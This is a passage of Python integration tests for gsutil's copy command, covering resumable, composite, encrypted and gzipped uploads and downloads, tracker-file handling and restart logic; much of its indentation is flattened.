boto_config_for_test = ('GSUtil', 'resumable_threshold', str(ONE_KIB))
with SetBotoConfigForTest([boto_config_for_test]):
stderr = self.RunGsUtil([
'-D', 'cp', '--testcallbackfile', test_callback_file, fpath,
suri(bucket_uri)
],
                              return_stderr=True)
if self.test_api == ApiSelector.XML:
self.assertIn('Got retryable failure', stderr)
else:
self.assertIn('Retrying', stderr)
@SkipForS3('No resumable upload support for S3.')
def test_cp_resumable_streaming_upload_retry(self):
"""Tests that a streaming resumable upload completes with one retry."""
if self.test_api == ApiSelector.XML:
return unittest.skip('XML does not support resumable streaming uploads.')
bucket_uri = self.CreateBucket()
test_callback_file = self.CreateTempFile(contents=pickle.dumps(
_ResumableUploadRetryHandler(5, apitools_exceptions.BadStatusCodeError,
('unused', 'unused', 'unused'))))
# Need to reduce the JSON chunk size since streaming uploads buffer a
# full chunk.
boto_configs_for_test = [('GSUtil', 'json_resumable_chunk_size',
str(256 * ONE_KIB)), ('Boto', 'num_retries', '2')]
with SetBotoConfigForTest(boto_configs_for_test):
stderr = self.RunGsUtil([
'-D', 'cp', '--testcallbackfile', test_callback_file, '-',
suri(bucket_uri, 'foo')
],
stdin='a' * 512 * ONE_KIB,
                              return_stderr=True)
self.assertIn('Retrying', stderr)
@SkipForS3('preserve_acl flag not supported for S3.')
def test_cp_preserve_no_owner(self):
bucket_uri = self.CreateBucket()
object_uri = self.CreateObject(bucket_uri=bucket_uri, contents=b'foo')
# Anonymous user can read the object and write to the bucket, but does
# not own the object.
self.RunGsUtil(['acl', 'ch', '-u', 'AllUsers:R', suri(object_uri)])
self.RunGsUtil(['acl', 'ch', '-u', 'AllUsers:W', suri(bucket_uri)])
with self.SetAnonymousBotoCreds():
stderr = self.RunGsUtil(
['cp', '-p', suri(object_uri),
suri(bucket_uri, 'foo')],
return_stderr=True,
expected_status=1)
self.assertIn('OWNER permission is required for preserving ACLs', stderr)
@SkipForS3('No resumable upload support for S3.')
def test_cp_progress_callbacks(self):
bucket_uri = self.CreateBucket()
final_size_string = BytesToFixedWidthString(1024**2)
final_progress_callback = final_size_string + '/' + final_size_string
fpath = self.CreateTempFile(contents=b'a' * ONE_MIB, file_name='foo')
boto_config_for_test = ('GSUtil', 'resumable_threshold', str(ONE_KIB))
with SetBotoConfigForTest([boto_config_for_test]):
stderr = self.RunGsUtil(['cp', fpath, suri(bucket_uri)],
return_stderr=True)
      self.assertEqual(1, stderr.count(final_progress_callback))
boto_config_for_test = ('GSUtil', 'resumable_threshold', str(2 * ONE_MIB))
with SetBotoConfigForTest([boto_config_for_test]):
stderr = self.RunGsUtil(['cp', fpath, suri(bucket_uri)],
return_stderr=True)
      self.assertEqual(1, stderr.count(final_progress_callback))
stderr = self.RunGsUtil(['cp', suri(bucket_uri, 'foo'), fpath],
return_stderr=True)
      self.assertEqual(1, stderr.count(final_progress_callback))
@SkipForS3('No resumable upload support for S3.')
def test_cp_resumable_upload(self):
"""Tests that a basic resumable upload completes successfully."""
bucket_uri = self.CreateBucket()
fpath = self.CreateTempFile(contents=b'a' * self.halt_size)
boto_config_for_test = ('GSUtil', 'resumable_threshold', str(ONE_KIB))
with SetBotoConfigForTest([boto_config_for_test]):
self.RunGsUtil(['cp', fpath, suri(bucket_uri)])
@SkipForS3('No resumable upload support for S3.')
def test_resumable_upload_break_leaves_tracker(self):
"""Tests that a tracker file is created with a resumable upload."""
bucket_uri = self.CreateBucket()
fpath = self.CreateTempFile(file_name='foo', contents=b'a' * self.halt_size)
boto_config_for_test = ('GSUtil', 'resumable_threshold', str(ONE_KIB))
with SetBotoConfigForTest([boto_config_for_test]):
tracker_filename = GetTrackerFilePath(
StorageUrlFromString(suri(bucket_uri, 'foo')), TrackerFileType.UPLOAD,
self.test_api)
test_callback_file = self.CreateTempFile(
contents=pickle.dumps(HaltingCopyCallbackHandler(True, 5)))
try:
stderr = self.RunGsUtil([
'cp', '--testcallbackfile', test_callback_file, fpath,
suri(bucket_uri, 'foo')
],
expected_status=1,
return_stderr=True)
self.assertIn('Artifically halting upload', stderr)
self.assertTrue(os.path.exists(tracker_filename),
'Tracker file %s not present.' % tracker_filename)
# Test the permissions
if os.name == 'posix':
mode = oct(stat.S_IMODE(os.stat(tracker_filename).st_mode))
# Assert that only user has read/write permission
self.assertEqual(oct(0o600), mode)
finally:
DeleteTrackerFile(tracker_filename)
@SkipForS3('No resumable upload support for S3.')
def test_cp_resumable_upload_break_file_size_change(self):
"""Tests a resumable upload where the uploaded file changes size.
This should fail when we read the tracker data.
"""
bucket_uri = self.CreateBucket()
tmp_dir = self.CreateTempDir()
fpath = self.CreateTempFile(file_name='foo',
tmpdir=tmp_dir,
contents=b'a' * self.halt_size)
test_callback_file = self.CreateTempFile(
contents=pickle.dumps(HaltingCopyCallbackHandler(True, 5)))
boto_config_for_test = ('GSUtil', 'resumable_threshold', str(ONE_KIB))
with SetBotoConfigForTest([boto_config_for_test]):
stderr = self.RunGsUtil([
'cp', '--testcallbackfile', test_callback_file, fpath,
suri(bucket_uri)
],
expected_status=1,
return_stderr=True)
self.assertIn('Artifically halting upload', stderr)
fpath = self.CreateTempFile(file_name='foo',
tmpdir=tmp_dir,
contents=b'a' * self.halt_size * 2)
stderr = self.RunGsUtil(['cp', fpath, suri(bucket_uri)],
expected_status=1,
return_stderr=True)
self.assertIn('ResumableUploadAbortException', stderr)
@SkipForS3('No resumable upload support for S3.')
def test_cp_resumable_upload_break_file_content_change(self):
"""Tests a resumable upload where the uploaded file changes content."""
if self.test_api == ApiSelector.XML:
return unittest.skip(
'XML doesn\'t make separate HTTP calls at fixed-size boundaries for '
'resumable uploads, so we can\'t guarantee that the server saves a '
'specific part of the upload.')
bucket_uri = self.CreateBucket()
tmp_dir = self.CreateTempDir()
fpath = self.CreateTempFile(file_name='foo',
tmpdir=tmp_dir,
contents=b'a' * ONE_KIB * ONE_KIB)
test_callback_file = self.CreateTempFile(contents=pickle.dumps(
HaltingCopyCallbackHandler(True,
int(ONE_KIB) * 512)))
resumable_threshold_for_test = ('GSUtil', 'resumable_threshold',
str(ONE_KIB))
resumable_chunk_size_for_test = ('GSUtil', 'json_resumable_chunk_size',
str(ONE_KIB * 256))
with SetBotoConfigForTest(
[resumable_threshold_for_test, resumable_chunk_size_for_test]):
stderr = self.RunGsUtil([
'cp', '--testcallbackfile', test_callback_file, fpath,
suri(bucket_uri)
],
expected_status=1,
return_stderr=True)
self.assertIn('Artifically halting upload', stderr)
fpath = self.CreateTempFile(file_name='foo',
tmpdir=tmp_dir,
contents=b'b' * ONE_KIB * ONE_KIB)
stderr = self.RunGsUtil(['cp', fpath, suri(bucket_uri)],
expected_status=1,
return_stderr=True)
self.assertIn('doesn\'t match cloud-supplied digest', stderr)
@SkipForS3('No resumable upload support for S3.')
def test_cp_resumable_upload_break_file_smaller_size(self):
"""Tests a resumable upload where the uploaded file changes content.
This should fail hash validation.
"""
bucket_uri = self.CreateBucket()
tmp_dir = self.CreateTempDir()
fpath = self.CreateTempFile(file_name='foo',
tmpdir=tmp_dir,
contents=b'a' * ONE_KIB * ONE_KIB)
test_callback_file = self.CreateTempFile(contents=pickle.dumps(
HaltingCopyCallbackHandler(True,
int(ONE_KIB) * 512)))
resumable_threshold_for_test = ('GSUtil', 'resumable_threshold',
str(ONE_KIB))
resumable_chunk_size_for_test = ('GSUtil', 'json_resumable_chunk_size',
str(ONE_KIB * 256))
with SetBotoConfigForTest(
[resumable_threshold_for_test, resumable_chunk_size_for_test]):
stderr = self.RunGsUtil([
'cp', '--testcallbackfile', test_callback_file, fpath,
suri(bucket_uri)
],
expected_status=1,
return_stderr=True)
self.assertIn('Artifically halting upload', stderr)
fpath = self.CreateTempFile(file_name='foo',
tmpdir=tmp_dir,
contents=b'a' * ONE_KIB)
stderr = self.RunGsUtil(['cp', fpath, suri(bucket_uri)],
expected_status=1,
return_stderr=True)
self.assertIn('ResumableUploadAbortException', stderr)
@SkipForS3('No resumable upload support for S3.')
def test_cp_composite_encrypted_upload_resume(self):
"""Tests that an encrypted composite upload resumes successfully."""
if self.test_api == ApiSelector.XML:
return unittest.skip(
'gsutil does not support encryption with the XML API')
bucket_uri = self.CreateBucket()
dst_url = StorageUrlFromString(suri(bucket_uri, 'foo'))
file_contents = b'foobar'
file_name = 'foobar'
source_file = self.CreateTempFile(contents=file_contents,
file_name=file_name)
src_url = StorageUrlFromString(source_file)
# Simulate an upload that had occurred by writing a tracker file
# that points to a previously uploaded component.
tracker_file_name = GetTrackerFilePath(dst_url,
TrackerFileType.PARALLEL_UPLOAD,
self.test_api, src_url)
tracker_prefix = '123'
# Create component 0 to be used in the resume; it must match the name
# that will be generated in copy_helper, so we use the same scheme.
encoded_name = (PARALLEL_UPLOAD_STATIC_SALT + source_file).encode(UTF8)
content_md5 = GetMd5()
content_md5.update(encoded_name)
digest = content_md5.hexdigest()
component_object_name = (tracker_prefix + PARALLEL_UPLOAD_TEMP_NAMESPACE +
digest + '_0')
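    # The component name is therefore derived deterministically from the
    # tracker prefix plus a salted MD5 of the source file path and the
    # component index, so the resumed upload below can find and reuse the
    # existing component object.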
component_size = 3
object_uri = self.CreateObject(bucket_uri=bucket_uri,
object_name=component_object_name,
contents=file_contents[:component_size],
encryption_key=TEST_ENCRYPTION_KEY1)
existing_component = ObjectFromTracker(component_object_name,
str(object_uri.generation))
existing_components = [existing_component]
enc_key_sha256 = TEST_ENCRYPTION_KEY1_SHA256_B64
WriteParallelUploadTrackerFile(tracker_file_name,
tracker_prefix,
existing_components,
encryption_key_sha256=enc_key_sha256)
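    # The parallel-upload tracker file records the prefix, the already
    # uploaded components (name and generation), and the SHA256 of the CSEK,
    # which lets a later attempt detect whether the encryption key changed.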
try:
# Now "resume" the upload using the original encryption key.
with SetBotoConfigForTest([
('GSUtil', 'parallel_composite_upload_threshold', '1'),
('GSUtil', 'parallel_composite_upload_component_size',
str(component_size)),
('GSUtil', 'encryption_key', TEST_ENCRYPTION_KEY1)
]):
stderr = self.RunGsUtil(
['cp', source_file, suri(bucket_uri, 'foo')], return_stderr=True)
self.assertIn('Found 1 existing temporary components to reuse.', stderr)
self.assertFalse(
os.path.exists(tracker_file_name),
'Tracker file %s should have been deleted.' % tracker_file_name)
read_contents = self.RunGsUtil(['cat', suri(bucket_uri, 'foo')],
return_stdout=True)
self.assertEqual(read_contents.encode('ascii'), file_contents)
finally:
# Clean up if something went wrong.
DeleteTrackerFile(tracker_file_name)
@SkipForS3('No resumable upload support for S3.')
def test_cp_composite_encrypted_upload_restart(self):
"""Tests that encrypted composite upload restarts given a different key."""
if self.test_api == ApiSelector.XML:
return unittest.skip(
'gsutil does not support encryption with the XML API')
bucket_uri = self.CreateBucket()
dst_url = StorageUrlFromString(suri(bucket_uri, 'foo'))
file_contents = b'foobar'
source_file = self.CreateTempFile(contents=file_contents, file_name='foo')
src_url = StorageUrlFromString(source_file)
# Simulate an upload that had occurred by writing a tracker file.
tracker_file_name = GetTrackerFilePath(dst_url,
TrackerFileType.PARALLEL_UPLOAD,
self.test_api, src_url)
tracker_prefix = '123'
existing_component_name = 'foo_1'
object_uri = self.CreateObject(bucket_uri=bucket_uri,
object_name='foo_1',
contents=b'foo',
encryption_key=TEST_ENCRYPTION_KEY1)
existing_component = ObjectFromTracker(existing_component_name,
str(object_uri.generation))
existing_components = [existing_component]
enc_key_sha256 = TEST_ENCRYPTION_KEY1_SHA256_B64
WriteParallelUploadTrackerFile(tracker_file_name, tracker_prefix,
existing_components,
enc_key_sha256.decode('ascii'))
try:
# Now "resume" the upload using the original encryption key.
with SetBotoConfigForTest([
('GSUtil', 'parallel_composite_upload_threshold', '1'),
('GSUtil', 'parallel_composite_upload_component_size', '3'),
('GSUtil', 'encryption_key', TEST_ENCRYPTION_KEY2)
]):
stderr = self.RunGsUtil(
['cp', source_file, suri(bucket_uri, 'foo')], return_stderr=True)
self.assertIn(
'does not match current encryption key. '
'Deleting old components and restarting upload', stderr)
self.assertNotIn('existing temporary components to reuse.', stderr)
self.assertFalse(
os.path.exists(tracker_file_name),
'Tracker file %s should have been deleted.' % tracker_file_name)
read_contents = self.RunGsUtil(['cat', suri(bucket_uri, 'foo')],
return_stdout=True)
self.assertEqual(read_contents.encode('ascii'), file_contents)
finally:
# Clean up if something went wrong.
DeleteTrackerFile(tracker_file_name)
@SkipForS3('Test uses gs-specific KMS encryption')
def test_kms_key_correctly_applied_to_composite_upload(self):
bucket_uri = self.CreateBucket()
fpath = self.CreateTempFile(contents=b'abcd')
obj_suri = suri(bucket_uri, 'composed')
key_fqn = self.authorize_project_to_use_testing_kms_key()
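    # key_fqn is a fully qualified Cloud KMS key name (of the form
    # projects/<p>/locations/<l>/keyRings/<r>/cryptoKeys/<k>). Configuring it
    # as encryption_key makes gsutil request CMEK encryption rather than
    # supplying a CSEK; the assertion below checks that the composed object
    # ended up encrypted with that key.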
with SetBotoConfigForTest([
('GSUtil', 'encryption_key', key_fqn),
('GSUtil', 'parallel_composite_upload_threshold', '1'),
('GSUtil', 'parallel_composite_upload_component_size', '1')
]):
self.RunGsUtil(['cp', fpath, obj_suri])
with SetBotoConfigForTest([('GSUtil', 'prefer_api', 'json')]):
self.AssertObjectUsesCMEK(obj_suri, key_fqn)
  # This temporarily makes the tracker directory unwritable, which interferes
  # with any parallel-running tests that use the tracker directory.
@NotParallelizable
@SkipForS3('No resumable upload support for S3.')
@unittest.skipIf(IS_WINDOWS, 'chmod on dir unsupported on Windows.')
@SequentialAndParallelTransfer
def test_cp_unwritable_tracker_file(self):
"""Tests a resumable upload with an unwritable tracker file."""
bucket_uri = self.CreateBucket()
tracker_filename = GetTrackerFilePath(
StorageUrlFromString(suri(bucket_uri, 'foo')), TrackerFileType.UPLOAD,
self.test_api)
tracker_dir = os.path.dirname(tracker_filename)
fpath = self.CreateTempFile(file_name='foo', contents=b'a' * ONE_KIB)
boto_config_for_test = ('GSUtil', 'resumable_threshold', str(ONE_KIB))
save_mod = os.stat(tracker_dir).st_mode
try:
os.chmod(tracker_dir, 0)
with SetBotoConfigForTest([boto_config_for_test]):
stderr = self.RunGsUtil(['cp', fpath, suri(bucket_uri)],
expected_status=1,
return_stderr=True)
self.assertIn('Couldn\'t write tracker file', stderr)
finally:
os.chmod(tracker_dir, save_mod)
if os.path.exists(tracker_filename):
os.unlink(tracker_filename)
  # This temporarily makes the tracker directory unwritable, which interferes
  # with any parallel-running tests that use the tracker directory.
@NotParallelizable
@unittest.skipIf(IS_WINDOWS, 'chmod on dir unsupported on Windows.')
@SequentialAndParallelTransfer
def test_cp_unwritable_tracker_file_download(self):
"""Tests downloads with an unwritable tracker file."""
object_uri = self.CreateObject(contents=b'foo' * ONE_KIB)
tracker_filename = GetTrackerFilePath(
StorageUrlFromString(suri(object_uri)), TrackerFileType.DOWNLOAD,
self.test_api)
tracker_dir = os.path.dirname(tracker_filename)
fpath = self.CreateTempFile()
save_mod = os.stat(tracker_dir).st_mode
try:
os.chmod(tracker_dir, 0)
boto_config_for_test = ('GSUtil', 'resumable_threshold', str(EIGHT_MIB))
with SetBotoConfigForTest([boto_config_for_test]):
# Should succeed because we are below the threshold.
self.RunGsUtil(['cp', suri(object_uri), fpath])
boto_config_for_test = ('GSUtil', 'resumable_threshold', str(ONE_KIB))
with SetBotoConfigForTest([boto_config_for_test]):
stderr = self.RunGsUtil(['cp', suri(object_uri), fpath],
expected_status=1,
return_stderr=True)
self.assertIn('Couldn\'t write tracker file', stderr)
finally:
os.chmod(tracker_dir, save_mod)
if os.path.exists(tracker_filename):
os.unlink(tracker_filename)
def _test_cp_resumable_download_break_helper(self,
boto_config,
encryption_key=None):
"""Helper function for different modes of resumable download break.
Args:
boto_config: List of boto configuration tuples for use with
SetBotoConfigForTest.
encryption_key: Base64 encryption key for object encryption (if any).
"""
bucket_uri = self.CreateBucket()
file_contents = b'a' * self.halt_size
object_uri = self.CreateObject(bucket_uri=bucket_uri,
object_name='foo',
contents=file_contents,
encryption_key=encryption_key)
fpath = self.CreateTempFile()
test_callback_file = self.CreateTempFile(
contents=pickle.dumps(HaltingCopyCallbackHandler(False, 5)))
with SetBotoConfigForTest(boto_config):
stderr = self.RunGsUtil([
'cp', '--testcallbackfile', test_callback_file,
suri(object_uri), fpath
],
expected_status=1,
return_stderr=True)
self.assertIn('Artifically halting download.', stderr)
tracker_filename = GetTrackerFilePath(StorageUrlFromString(fpath),
TrackerFileType.DOWNLOAD,
self.test_api)
self.assertTrue(os.path.isfile(tracker_filename))
stderr = self.RunGsUtil(['cp', suri(object_uri), fpath],
return_stderr=True)
self.assertIn('Resuming download', stderr)
with open(fpath, 'rb') as f:
self.assertEqual(f.read(), file_contents, 'File contents differ')
def test_cp_resumable_download_break(self):
"""Tests that a download can be resumed after a connection break."""
self._test_cp_resumable_download_break_helper([
('GSUtil', 'resumable_threshold', str(ONE_KIB))
])
@SkipForS3('gsutil doesn\'t support S3 customer-supplied encryption keys.')
def test_cp_resumable_encrypted_download_break(self):
"""Tests that an encrypted download resumes after a connection break."""
if self.test_api == ApiSelector.XML:
return unittest.skip(
'gsutil does not support encryption with the XML API')
self._test_cp_resumable_download_break_helper(
[('GSUtil', 'resumable_threshold', str(ONE_KIB)),
('GSUtil', 'encryption_key', TEST_ENCRYPTION_KEY1)],
encryption_key=TEST_ENCRYPTION_KEY1)
@SkipForS3('gsutil doesn\'t support S3 customer-supplied encryption keys.')
def test_cp_resumable_encrypted_download_key_rotation(self):
"""Tests that a download restarts with a rotated encryption key."""
if self.test_api == ApiSelector.XML:
return unittest.skip(
'gsutil does not support encryption with the XML API')
bucket_uri = self.CreateBucket()
file_contents = b'a' * self.halt_size
object_uri = self.CreateObject(bucket_uri=bucket_uri,
object_name='foo',
contents=file_contents,
encryption_key=TEST_ENCRYPTION_KEY1)
fpath = self.CreateTempFile()
test_callback_file = self.CreateTempFile(
contents=pickle.dumps(HaltingCopyCallbackHandler(False, 5)))
boto_config_for_test = [('GSUtil', 'resumable_threshold', str(ONE_KIB)),
('GSUtil', 'encryption_key', TEST_ENCRYPTION_KEY1)]
with SetBotoConfigForTest(boto_config_for_test):
stderr = self.RunGsUtil([
'cp', '--testcallbackfile', test_callback_file,
suri(object_uri), fpath
],
expected_status=1,
return_stderr=True)
self.assertIn('Artifically halting download.', stderr)
tracker_filename = GetTrackerFilePath(StorageUrlFromString(fpath),
TrackerFileType.DOWNLOAD,
self.test_api)
self.assertTrue(os.path.isfile(tracker_filename))
# After simulated connection break, rotate the key on the object.
boto_config_for_test2 = [('GSUtil', 'resumable_threshold', str(ONE_KIB)),
('GSUtil', 'decryption_key1',
TEST_ENCRYPTION_KEY1),
('GSUtil', 'encryption_key', TEST_ENCRYPTION_KEY2)]
with SetBotoConfigForTest(boto_config_for_test2):
self.RunGsUtil(['rewrite', '-k', suri(object_uri)])
# Now resume the download using only the new encryption key. Since its
# generation changed, we must restart it.
boto_config_for_test3 = [('GSUtil', 'resumable_threshold', str(ONE_KIB)),
('GSUtil', 'encryption_key', TEST_ENCRYPTION_KEY2)]
with SetBotoConfigForTest(boto_config_for_test3):
stderr = self.RunGsUtil(['cp', suri(object_uri), fpath],
return_stderr=True)
self.assertIn('Restarting download', stderr)
with open(fpath, 'rb') as f:
self.assertEqual(f.read(), file_contents, 'File contents differ')
@SequentialAndParallelTransfer
def test_cp_resumable_download_etag_differs(self):
"""Tests that download restarts the file when the source object changes.
This causes the etag not to match.
"""
bucket_uri = self.CreateBucket()
object_uri = self.CreateObject(bucket_uri=bucket_uri,
object_name='foo',
contents=b'abc' * self.halt_size)
fpath = self.CreateTempFile()
test_callback_file = self.CreateTempFile(
contents=pickle.dumps(HaltingCopyCallbackHandler(False, 5)))
boto_config_for_test = ('GSUtil', 'resumable_threshold', str(ONE_KIB))
with SetBotoConfigForTest([boto_config_for_test]):
# This will create a tracker file with an ETag.
stderr = self.RunGsUtil([
'cp', '--testcallbackfile', test_callback_file,
suri(object_uri), fpath
],
expected_status=1,
return_stderr=True)
self.assertIn('Artifically halting download.', stderr)
# Create a new object with different contents - it should have a
# different ETag since the content has changed.
object_uri = self.CreateObject(
bucket_uri=bucket_uri,
object_name='foo',
contents=b'b' * self.halt_size,
gs_idempotent_generation=object_uri.generation)
stderr = self.RunGsUtil(['cp', suri(object_uri), fpath],
return_stderr=True)
self.assertNotIn('Resuming download', stderr)
# TODO: Enable this test for sequential downloads when their tracker files are
# modified to contain the source object generation.
@unittest.skipUnless(UsingCrcmodExtension(),
'Sliced download requires fast crcmod.')
@SkipForS3('No sliced download support for S3.')
def test_cp_resumable_download_generation_differs(self):
"""Tests that a resumable download restarts if the generation differs."""
bucket_uri = self.CreateBucket()
file_contents = b'abcd' * self.halt_size
object_uri = self.CreateObject(bucket_uri=bucket_uri,
object_name='foo',
contents=file_contents)
fpath = self.CreateTempFile()
test_callback_file = self.CreateTempFile(
contents=pickle.dumps(HaltingCopyCallbackHandler(False, 5)))
boto_config_for_test = [
('GSUtil', 'resumable_threshold', str(self.halt_size)),
('GSUtil', 'sliced_object_download_threshold', str(self.halt_size)),
('GSUtil', 'sliced_object_download_max_components', '3')
]
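    # Setting both thresholds to halt_size and capping components at 3 forces
    # this download to run as a sliced (multi-range, parallel) download, whose
    # per-component tracker files record the source object generation (unlike
    # sequential download tracker files; see the TODO above).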
with SetBotoConfigForTest(boto_config_for_test):
stderr = self.RunGsUtil([
'cp', '--testcallbackfile', test_callback_file,
suri(object_uri),
suri(fpath)
],
return_stderr=True,
expected_status=1)
self.assertIn('Artifically halting download.', stderr)
# Overwrite the object with an identical object, increasing
# the generation but leaving other metadata the same.
identical_file = self.CreateTempFile(contents=file_contents)
self.RunGsUtil(['cp', suri(identical_file), suri(object_uri)])
stderr = self.RunGsUtil(
['cp', suri(object_uri), suri(fpath)], return_stderr=True)
self.assertIn('Restarting download from scratch', stderr)
with open(fpath, 'rb') as f:
self.assertEqual(f.read(), file_contents, 'File contents differ')
def test_cp_resumable_download_file_larger(self):
"""Tests download deletes the tracker file when existing file is larger."""
bucket_uri = self.CreateBucket()
fpath = self.CreateTempFile()
object_uri = self.CreateObject(bucket_uri=bucket_uri,
object_name='foo',
contents=b'a' * self.halt_size)
test_callback_file = self.CreateTempFile(
contents=pickle.dumps(HaltingCopyCallbackHandler(False, 5)))
boto_config_for_test = ('GSUtil', 'resumable_threshold', str(ONE_KIB))
with SetBotoConfigForTest([boto_config_for_test]):
stderr = self.RunGsUtil([
'cp', '--testcallbackfile', test_callback_file,
suri(object_uri), fpath
],
expected_status=1,
return_stderr=True)
self.assertIn('Artifically halting download.', stderr)
with open(fpath + '_.gstmp', 'w') as larger_file:
for _ in range(self.halt_size * 2):
larger_file.write('a')
stderr = self.RunGsUtil(['cp', suri(object_uri), fpath],
expected_status=1,
return_stderr=True)
self.assertNotIn('Resuming download', stderr)
self.assertIn('Deleting tracker file', stderr)
def test_cp_resumable_download_content_differs(self):
"""Tests that we do not re-download when tracker file matches existing file.
We only compare size, not contents, so re-download should not occur even
though the contents are technically different. However, hash validation on
the file should still occur, and the file will then be deleted because
the hashes differ.
"""
bucket_uri = self.CreateBucket()
tmp_dir = self.CreateTempDir()
fpath = self.CreateTempFile(tmpdir=tmp_dir)
temp_download_file = fpath + '_.gstmp'
with open(temp_download_file, 'w') as fp:
fp.write('abcd' * ONE_KIB)
object_uri = self.CreateObject(bucket_uri=bucket_uri,
object_name='foo',
contents=b'efgh' * ONE_KIB)
stdout = self.RunGsUtil(['ls', '-L', suri(object_uri)], return_stdout=True)
etag_match = re.search(r'\s*ETag:\s*(.*)', stdout)
self.assertIsNotNone(etag_match, 'Could not get object ETag')
self.assertEqual(len(etag_match.groups()), 1,
'Did not match expected single ETag')
etag = etag_match.group(1)
tracker_filename = GetTrackerFilePath(StorageUrlFromString(fpath),
TrackerFileType.DOWNLOAD,
self.test_api)
try:
with open(tracker_filename, 'w') as tracker_fp:
tracker_fp.write(etag)
boto_config_for_test = ('GSUtil', 'resumable_threshold', str(ONE_KIB))
with SetBotoConfigForTest([boto_config_for_test]):
stderr = self.RunGsUtil(['cp', suri(object_uri), fpath],
return_stderr=True,
expected_status=1)
self.assertIn('Download already complete', stderr)
self.assertIn('doesn\'t match cloud-supplied digest', stderr)
# File and tracker file should be deleted.
self.assertFalse(os.path.isfile(temp_download_file))
self.assertFalse(os.path.isfile(tracker_filename))
# Permanent file should not have been created.
self.assertFalse(os.path.isfile(fpath))
finally:
if os.path.exists(tracker_filename):
os.unlink(tracker_filename)
def test_cp_resumable_download_content_matches(self):
"""Tests download no-ops when tracker file matches existing file."""
bucket_uri = self.CreateBucket()
tmp_dir = self.CreateTempDir()
fpath = self.CreateTempFile(tmpdir=tmp_dir)
matching_contents = b'abcd' * ONE_KIB
temp_download_file = fpath + '_.gstmp'
with open(temp_download_file, 'wb') as fp:
fp.write(matching_contents)
object_uri = self.CreateObject(bucket_uri=bucket_uri,
object_name='foo',
contents=matching_contents)
stdout = self.RunGsUtil(['ls', '-L', suri(object_uri)], return_stdout=True)
etag_match = re.search(r'\s*ETag:\s*(.*)', stdout)
self.assertIsNotNone(etag_match, 'Could not get object ETag')
self.assertEqual(len(etag_match.groups()), 1,
'Did not match expected single ETag')
etag = etag_match.group(1)
tracker_filename = GetTrackerFilePath(StorageUrlFromString(fpath),
TrackerFileType.DOWNLOAD,
self.test_api)
with open(tracker_filename, 'w') as tracker_fp:
tracker_fp.write(etag)
try:
boto_config_for_test = ('GSUtil', 'resumable_threshold', str(ONE_KIB))
with SetBotoConfigForTest([boto_config_for_test]):
stderr = self.RunGsUtil(['cp', suri(object_uri), fpath],
return_stderr=True)
self.assertIn('Download already complete', stderr)
# Tracker file should be removed after successful hash validation.
self.assertFalse(os.path.isfile(tracker_filename))
finally:
if os.path.exists(tracker_filename):
os.unlink(tracker_filename)
def test_cp_resumable_download_tracker_file_not_matches(self):
"""Tests that download overwrites when tracker file etag does not match."""
bucket_uri = self.CreateBucket()
tmp_dir = self.CreateTempDir()
fpath = self.CreateTempFile(tmpdir=tmp_dir, contents=b'abcd' * ONE_KIB)
object_uri = self.CreateObject(bucket_uri=bucket_uri,
object_name='foo',
contents=b'efgh' * ONE_KIB)
stdout = self.RunGsUtil(['ls', '-L', suri(object_uri)], return_stdout=True)
etag_match = re.search(r'\s*ETag:\s*(.*)', stdout)
self.assertIsNotNone(etag_match, 'Could not get object ETag')
self.assertEqual(len(etag_match.groups()), 1,
'Did not match regex for exactly one object ETag')
etag = etag_match.group(1)
etag += 'nonmatching'
tracker_filename = GetTrackerFilePath(StorageUrlFromString(fpath),
TrackerFileType.DOWNLOAD,
self.test_api)
with open(tracker_filename, 'w') as tracker_fp:
tracker_fp.write(etag)
try:
boto_config_for_test = ('GSUtil', 'resumable_threshold', str(ONE_KIB))
with SetBotoConfigForTest([boto_config_for_test]):
stderr = self.RunGsUtil(['cp', suri(object_uri), fpath],
return_stderr=True)
self.assertNotIn('Resuming download', stderr)
# Ensure the file was overwritten.
with open(fpath, 'r') as in_fp:
contents = in_fp.read()
self.assertEqual(
contents, 'efgh' * ONE_KIB,
'File not overwritten when it should have been '
'due to a non-matching tracker file.')
self.assertFalse(os.path.isfile(tracker_filename))
finally:
if os.path.exists(tracker_filename):
os.unlink(tracker_filename)
def test_cp_double_gzip(self):
"""Tests that upload and download of a doubly-gzipped file succeeds."""
bucket_uri = self.CreateBucket()
fpath = self.CreateTempFile(file_name='looks-zipped.gz', contents=b'foo')
self.RunGsUtil([
'-h', 'content-type:application/gzip', 'cp', '-Z',
suri(fpath),
suri(bucket_uri, 'foo')
])
self.RunGsUtil(['cp', suri(bucket_uri, 'foo'), fpath])
@SkipForS3('No compressed transport encoding support for S3.')
@SkipForXML('No compressed transport encoding support for the XML API.')
@SequentialAndParallelTransfer
def test_cp_double_gzip_transport_encoded(self):
"""Tests that upload and download of a doubly-gzipped file succeeds."""
bucket_uri = self.CreateBucket()
fpath = self.CreateTempFile(file_name='looks-zipped.gz', contents=b'foo')
stderr = self.RunGsUtil([
'-D', '-h', 'content-type:application/gzip', 'cp', '-J',
suri(fpath),
suri(bucket_uri, 'foo')
],
return_stderr=True)
# Ensure the debug output shows that gzip transport encoding was used.
self.assertIn('send: Using gzip transport encoding for the request.',
stderr)
self.RunGsUtil(['cp', suri(bucket_uri, 'foo'), fpath])
@SequentialAndParallelTransfer
def test_cp_resumable_download_gzip(self):
"""Tests that download can be resumed successfully with a gzipped file."""
# Generate some reasonably incompressible data. This compresses to around
# 128 KiB in practice, but we assert specifically below that it is
# larger than self.halt_size to guarantee that we can halt the download
# partway through.
object_uri = self.CreateObject()
random.seed(0)
contents = str([
random.choice(string.ascii_letters) for _ in xrange(self.halt_size)
]).encode('ascii')
random.seed() # Reset the seed for any other tests.
fpath1 = self.CreateTempFile(file_name='unzipped.txt', contents=contents)
self.RunGsUtil(['cp', '-z', 'txt', suri(fpath1), suri(object_uri)])
# Use @Retry as hedge against bucket listing eventual consistency.
@Retry(AssertionError, tries=3, timeout_secs=1)
def _GetObjectSize():
stdout = self.RunGsUtil(['du', suri(object_uri)], return_stdout=True)
size_match = re.search(r'(\d+)\s+.*', stdout)
self.assertIsNotNone(size_match, 'Could not get object size')
self.assertEqual(len(size_match.groups()), 1,
'Did not match regex for exactly one object size.')
return long(size_match.group(1))
object_size = _GetObjectSize()
self.assertGreaterEqual(
object_size, self.halt_size,
'Compressed object size was not large enough to '
'allow for a halted download, so the test results '
'would be invalid. Please increase the compressed '
'object size in the test.')
fpath2 = self.CreateTempFile()
test_callback_file = self.CreateTempFile(
contents=pickle.dumps(HaltingCopyCallbackHandler(False, 5)))
boto_config_for_test = ('GSUtil', 'resumable_threshold', str(ONE_KIB))
with SetBotoConfigForTest([boto_config_for_test]):
stderr = self.RunGsUtil([
